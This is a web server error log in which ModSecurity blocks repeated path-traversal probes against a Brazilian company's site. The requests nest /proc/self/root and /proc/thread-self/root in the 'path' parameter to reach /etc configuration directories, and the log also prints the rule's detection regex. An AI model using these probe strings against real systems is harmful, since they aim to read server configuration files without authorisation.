[Thu Mar 19 04:55:12.064874 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:35194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur4AkwaGbbGflqUZCFdQAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:13.391431 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.243.128:35202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur4f-YZRR_7pZ7nDJdtAAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:14.751010 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:35216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur4vu8EFLIOrSqIptuegAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:16.077922 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.243.128:35222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur5F_V7PWP6ixUYl6MOQAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:17.192554 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:45702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur5eoXxyEfFpUF8f_hCQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:17.483046 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:35226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur5eyqAr6etmhZHNoz8AAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:18.525971 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:46266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur5gkwaGbbGflqUZCFfgAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:55:18.906138 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.243.128:35236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur5v-YZRR_7pZ7nDJdtgAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:21.295188 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:53462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur6eyqAr6etmhZHNoz8wAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:21.816115 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:53462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur6eyqAr6etmhZHNoz9AAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:21.978314 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:46268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur6eoXxyEfFpUF8f_hEQAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:23.215302 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.243.128:53474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur61_V7PWP6ixUYl6MSQAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:23.283749 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.241.31:46274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur6-yqAr6etmhZHNoz9QAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:55:24.531168 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:53476] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur7Mdf6f5d65gmYZRDvwAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:24.730937 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:46284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur7OyqAr6etmhZHNoz9gAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:26.067271 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:46290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur7gbLMZ6AikZjR9UtlwAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:26.921813 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:53480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur7l_V7PWP6ixUYl6MTwAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:27.347364 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:39558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur7-oXxyEfFpUF8f_hFQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:55:29.900868 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:53486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur8fu8EFLIOrSqIptuggAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:32.806444 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.243.128:33068] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur9BkFeYa1D6dYQnC-pgAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:33.646082 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:39564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur9fu8EFLIOrSqIptujQAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
